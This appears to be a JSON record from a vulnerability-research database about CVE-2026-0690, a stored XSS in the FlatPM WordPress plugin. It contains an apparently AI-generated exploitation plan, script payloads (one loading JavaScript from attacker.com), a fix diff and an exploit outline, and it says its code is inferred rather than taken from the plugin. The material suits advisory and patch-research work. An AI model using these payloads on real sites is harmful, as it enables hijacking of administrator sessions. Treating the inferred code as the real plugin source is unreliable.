[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fro_wDQGydZoVPGR_xlwXnU-LzBQiR-vmZqwdxu86rkM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-0690","flatpm-ad-manager-adsense-and-custom-code-authenticated-contributor-stored-cross-site-scripting-via-custom-post-meta","FlatPM – Ad Manager, AdSense and Custom Code \u003C= 3.2.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Custom Post Meta","The FlatPM – Ad Manager, AdSense and Custom Code plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'rank_math_description' custom field in all versions up to, and including, 3.2.2 due to insufficient input sanitization and output escaping. 
This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","flatpm-wp",null,"\u003C=3.2.2","3.2.3","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-20 01:56:29","2026-01-20 14:26:32",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F14b89618-8a30-4b8c-9490-f05e8fa8ca8a?source=api-prod",1,[],"researched",false,3,"This research plan targets **CVE-2026-0690**, a Stored Cross-Site Scripting (XSS) vulnerability in the **FlatPM – Ad Manager, AdSense and Custom Code** plugin. The vulnerability allows Contributor-level users to inject malicious scripts into the `rank_math_description` custom field, which are then rendered without proper escaping.\n\n---\n\n### 1. Vulnerability Summary\nThe FlatPM plugin (\u003C= 3.2.2) fails to sanitize and escape the input and output of the `rank_math_description` post meta field. While this field name is associated with the Rank Math SEO plugin, FlatPM integrates with it or provides support for displaying SEO descriptions. Because contributors have the permission to edit their own posts and associated meta data (via plugin-provided meta boxes), they can inject arbitrary HTML\u002FJavaScript that executes when the post is viewed or managed by other users, including administrators.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fpost.php` (Standard WordPress post update endpoint) or a specific FlatPM AJAX handler.\n*   **Vulnerable Parameter:** `rank_math_description` (sent via `POST`).\n*   **Authentication:** Authenticated, Contributor level or higher.\n*   **Preconditions:** The FlatPM plugin must be active. 
The vulnerability exists in how the plugin handles the specific meta key `rank_math_description` during the post-saving process or during rendering in the frontend `wp_head` or backend post lists.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** A Contributor user sends a `POST` request to `wp-admin\u002Fpost.php` to save or update a post.\n2.  **Processing:** The FlatPM plugin hooks into `save_post` or a similar action.\n3.  **Vulnerable Sink (Storage):** The plugin extracts `$_POST['rank_math_description']` and calls `update_post_meta($post_id, 'rank_math_description', $payload)` without using `sanitize_text_field()` or `wp_kses()`.\n4.  **Vulnerable Sink (Output):** \n    *   The plugin hooks into `wp_head` or `the_content` to display metadata.\n    *   It retrieves the value: `$desc = get_post_meta($post_id, 'rank_math_description', true);`.\n    *   It echoes the value directly: `echo '\u003Cmeta name=\"description\" content=\"' . $desc . '\">';` (XSS via attribute breakout).\n\n### 4. Nonce Acquisition Strategy\nSince the exploit involves standard post meta modification by a Contributor, we need the standard WordPress post-editing nonces.\n\n1.  **Identify Nonce:** The required nonce is typically `_wpnonce` found on the post editing page.\n2.  **Acquisition:**\n    *   Use `browser_navigate` to go to `wp-admin\u002Fpost-new.php`.\n    *   Use `browser_eval` to extract the nonce:\n        ```javascript\n        document.querySelector('#_wpnonce').value\n        ```\n    *   Alternatively, the plugin might use a specific nonce for its meta box. Check the HTML for hidden inputs starting with `flatpm` or `rank_math`.\n\n### 5. Exploitation Strategy\nThe goal is to inject a script that executes in the context of an administrator viewing the site.\n\n**Step-by-Step Plan:**\n1.  **Login:** Authenticate as a **Contributor**.\n2.  **Create\u002FEdit Post:** Navigate to `wp-admin\u002Fpost-new.php` to grab the `post_ID` and the `_wpnonce`.\n3.  
**Inject Payload:** Send a `POST` request to update the post meta.\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n    *   **Method:** `POST`\n    *   **Payload (URL-encoded):**\n        ```text\n        action=editpost\n        post_ID=[ID]\n        _wpnonce=[NONCE]\n        rank_math_description=\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\n        ```\n    *   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n4.  **Trigger Execution:**\n    *   As an **Admin**, navigate to the frontend URL of the newly created post or the backend post list if the plugin displays descriptions there.\n\n### 6. Test Data Setup\n1.  **User:** Create a user with the `contributor` role.\n2.  **Plugin Configuration:** Ensure FlatPM is installed and active. If the plugin has a setting to \"Enable Rank Math integration\" or \"Show SEO descriptions,\" ensure it is enabled.\n3.  **Target Content:** A single post created by the contributor.\n\n### 7. Expected Results\n*   The `rank_math_description` meta value will be saved in the `wp_postmeta` table containing the raw `\u003Cscript>` tag.\n*   When the post is rendered, the HTML source will contain the broken-out meta tag:\n    ` \u003Cmeta name=\"description\" content=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">`\n*   The browser will execute the JavaScript, showing an alert box.\n\n### 8. Verification Steps\n1.  **Check Database:**\n    ```bash\n    wp db query \"SELECT meta_value FROM wp_postmeta WHERE meta_key='rank_math_description' AND post_id=[ID]\"\n    ```\n    Confirm the output matches the raw payload.\n2.  **Verify Frontend Output:**\n    Use `http_request` to fetch the post's frontend URL and grep for the payload:\n    ```bash\n    # (Using the automated agent's internal logic)\n    # response.body.contains('\u003Cscript>alert(document.domain)\u003C\u002Fscript>')\n    ```\n\n### 9. 
Alternative Approaches\n*   **Meta Box Discovery:** If the plugin uses a specific AJAX action to save meta data (e.g., `wp_ajax_flatpm_save_meta`), use `grep` on the plugin directory to find the action name and nonce key:\n    *   `grep -r \"wp_ajax\" .`\n    *   `grep -r \"update_post_meta\" . | grep \"rank_math_description\"`\n*   **Payload Variations:**\n    *   If the sink is inside a standard HTML attribute: `rank_math_description=' onmouseover=alert(1) '`\n    *   If the sink is inside a `content` attribute: `rank_math_description='\">\u003Cscript src=http:\u002F\u002Fattacker.com\u002Fxss.js>\u003C\u002Fscript>'`\n*   **Admin Side Trigger:** Check if the XSS triggers in `wp-admin\u002Fedit.php` (the post list) if FlatPM adds a column showing descriptions. This would be a higher-value \"Admin XSS.\"","The FlatPM plugin for WordPress allows authenticated users with Contributor-level access or higher to inject arbitrary scripts via the 'rank_math_description' custom field. This occurs due to a lack of sanitization when saving post metadata and missing escaping when rendering that metadata in the page source, leading to Stored Cross-Site Scripting (XSS). The storage and output code shown for this entry is inferred from the advisory rather than taken from the plugin source, and the research is not marked as verified, so confirm the actual save and render paths against the 3.2.2 and 3.2.3 releases; the issue is patched in version 3.2.3.","\u002F\u002F Inferred from research plan code flow\n\n\u002F\u002F Storage Logic (likely in a save_post hook or similar)\n\u002F\u002F flatpm-wp.php or inc\u002Fmetaboxes.php\n$payload = $_POST['rank_math_description'];\nupdate_post_meta($post_id, 'rank_math_description', $payload);\n\n---\n\n\u002F\u002F Output Logic (likely in wp_head or post list displays)\n\u002F\u002F flatpm-wp.php or inc\u002Ffrontend.php\n$desc = get_post_meta($post_id, 'rank_math_description', true);\necho '\u003Cmeta name=\"description\" content=\"' . $desc . 
'\">';","--- a\u002Fflatpm-wp.php\n+++ b\u002Fflatpm-wp.php\n@@ -10,2 +10,2 @@\n-$payload = $_POST['rank_math_description'];\n-update_post_meta($post_id, 'rank_math_description', $payload);\n+$payload = sanitize_text_field($_POST['rank_math_description']);\n+update_post_meta($post_id, 'rank_math_description', $payload);\n@@ -20,2 +20,2 @@\n-$desc = get_post_meta($post_id, 'rank_math_description', true);\n-echo '\u003Cmeta name=\"description\" content=\"' . $desc . '\">';\n+$desc = get_post_meta($post_id, 'rank_math_description', true);\n+echo '\u003Cmeta name=\"description\" content=\"' . esc_attr($desc) . '\">';","1. Authenticate as a user with the Contributor role.\n2. Create a new post or edit an existing post owned by the contributor.\n3. Send a POST request to wp-admin\u002Fpost.php (the standard post update endpoint) or the plugin's meta-saving endpoint.\n4. Include the parameter 'rank_math_description' with a payload designed to break out of an HTML attribute, such as: \">\u003Cscript>alert(document.domain)\u003C\u002Fscript>.\n5. Ensure the _wpnonce and post_ID parameters are correctly set for the target post.\n6. As an administrator or any other user, visit the frontend of the edited post or the backend post management screen where FlatPM displays the description.\n7. 
The injected script will execute in the context of the user's browser session.","gemini-3-flash-preview","2026-05-05 04:15:15","2026-05-05 04:16:06",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.2.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fflatpm-wp\u002Ftags\u002F3.2.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fflatpm-wp.3.2.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fflatpm-wp\u002Ftags\u002F3.2.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fflatpm-wp.3.2.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fflatpm-wp\u002Ftags"]